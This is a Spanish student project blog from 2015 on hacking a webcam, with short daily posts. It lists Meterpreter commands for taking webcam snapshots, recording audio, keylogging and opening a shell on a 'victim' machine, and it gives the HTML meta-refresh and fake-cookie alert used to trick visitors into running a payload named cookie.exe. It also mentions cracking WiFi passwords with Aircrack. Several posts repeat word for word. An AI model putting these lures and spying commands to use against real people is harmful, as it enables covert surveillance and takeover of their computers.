Hackear Webcam
dimarts, 2 de juny del 2015
dijous, 28 de maig del 2015
Video y Documentación
Hoy hemos acabado de grabar el video y pasaremos a editarlo, tambien terminaremos la documentación del trabajo.
dimecres, 27 de maig del 2015
Snort y Grabación del Proyecto
Hoy hemos investigado la herramienta snort.
También hemos comenzado a grabar un tutorial en video del proyecto el cual editaremos y presentaremos en CD el dia del proyecto. También hemos empezado la documentación del proyecto y el tutorial por escrito. El programa para realizar la grabación ha sido Record My Desktop de Ubuntu.
También hemos comenzado a grabar un tutorial en video del proyecto el cual editaremos y presentaremos en CD el dia del proyecto. También hemos empezado la documentación del proyecto y el tutorial por escrito. El programa para realizar la grabación ha sido Record My Desktop de Ubuntu.
dimarts, 26 de maig del 2015
Desencriptación WEP/WPA/WPA2-PSK
Hoy hemos investigado herramientas para descifrar contraseñas de un Router Wifi, con Kali Linux.
Aircrack ha sido la herramienta estudiada. Hemos aplicado los conocimientos aprendidos para esta herramienta y nos ha dado resultado.
Aircrack ha sido la herramienta estudiada. Hemos aplicado los conocimientos aprendidos para esta herramienta y nos ha dado resultado.
dilluns, 25 de maig del 2015
Comprobacion de lo aprendido
Hoy en el poco tiempo que hemos tenido de horas de proyecto hemos comprobado que todo lo aprendido y aplicado funcionaba correctamente. También hemos simulado el escenario de la presentación del proyecto y confirmado su funcionamiento.
divendres, 22 de maig del 2015
Meterpreter
Meterpreter es el exploit que realiza la conexión con el cliente una vez ejecutado el Payload en la victima.
Meterpreter tiene muchas funciones para realizar, algunas de ellas:
- webcam_list: Ver lista de cámaras
- run webcam 1: Ejecutar en live la primera webcam de la lista anterior
- webcam_snap: Hacer una foto y guardarla
- run sound_record -t 60: Graba 60 segundos de sonido y lo guarda
- screenshot: Hacer captura de pantalla
- ps: Ver los procesos y sus PID
- migrate: Migrar un proceso
- shell: Ejecuta terminal cmd
- upload: Subir una archivo
- download: Baja un archivo
- execute: Ejecuta archivos
- keyscan_start: Empieza el keylogger a registrar las teclas pulsadas
- keyscan_dump: Muestra todo lo registrado por el keylogger
- keyscan_stop: El keylogger para de registrar las teclas pulsadas
- search: Busca en el ordenador de la victima
- getprivs: Dar privilegios
- getuid: Nos muestra el tipo de usuario que esta ejecutándose ahora mismo
- sysinfo: Nos muestra información del sistema
- idletime: Permite mostrarnos el tiempo que el usuario a estado ausente
Meterpreter tiene muchas funciones para realizar, algunas de ellas:
- webcam_list: Ver lista de cámaras
- run webcam 1: Ejecutar en live la primera webcam de la lista anterior
- webcam_snap: Hacer una foto y guardarla
- run sound_record -t 60: Graba 60 segundos de sonido y lo guarda
- screenshot: Hacer captura de pantalla
- ps: Ver los procesos y sus PID
- migrate: Migrar un proceso
- shell: Ejecuta terminal cmd
- upload: Subir una archivo
- download: Baja un archivo
- execute: Ejecuta archivos
- keyscan_start: Empieza el keylogger a registrar las teclas pulsadas
- keyscan_dump: Muestra todo lo registrado por el keylogger
- keyscan_stop: El keylogger para de registrar las teclas pulsadas
- search: Busca en el ordenador de la victima
- getprivs: Dar privilegios
- getuid: Nos muestra el tipo de usuario que esta ejecutándose ahora mismo
- sysinfo: Nos muestra información del sistema
- idletime: Permite mostrarnos el tiempo que el usuario a estado ausente
dijous, 21 de maig del 2015
Como implementar Payload (III)
Finalmente, para que el cliente ejecute el payload lo hemos echo de la siguiente forma:
Primero de todo creamos un Payload con el nombre de cookie.exe y lo copiamos en var/www
Ahora abrimos la pagina fake con gedit, y escribimos justo después de <head> el siguiente código:
<meta httpequiv=”refresh” content=”2;cookie.exe”>
Y luego justo antes de cerrar el body, lo identificaremos con la etiqueta </body>, escribimos el siguiente script.
<script type=”text/javascript”> alert(“Para visualizar este sitio web, se requiera la instalación de un cookie”); </script>
Este código lo que hace es, primero se descargará el archivo cookie.exe, automáticamente pasado 2 segundos, y con el segundo código, va a aparecer una alerta en cuanto se cargue la pagina con el siguiente mensaje: Para visualizar este sitio web, se requiera la instalación de un cookie.Si la victima es tan ingenua como para ejecutar el cookie, ya podremos controlar su ordenador.
Primero de todo creamos un Payload con el nombre de cookie.exe y lo copiamos en var/www
Ahora abrimos la pagina fake con gedit, y escribimos justo después de <head> el siguiente código:
<meta httpequiv=”refresh” content=”2;cookie.exe”>
Y luego justo antes de cerrar el body, lo identificaremos con la etiqueta </body>, escribimos el siguiente script.
<script type=”text/javascript”> alert(“Para visualizar este sitio web, se requiera la instalación de un cookie”); </script>
Este código lo que hace es, primero se descargará el archivo cookie.exe, automáticamente pasado 2 segundos, y con el segundo código, va a aparecer una alerta en cuanto se cargue la pagina con el siguiente mensaje: Para visualizar este sitio web, se requiera la instalación de un cookie.Si la victima es tan ingenua como para ejecutar el cookie, ya podremos controlar su ordenador.
Subscriure's a:
Missatges (Atom)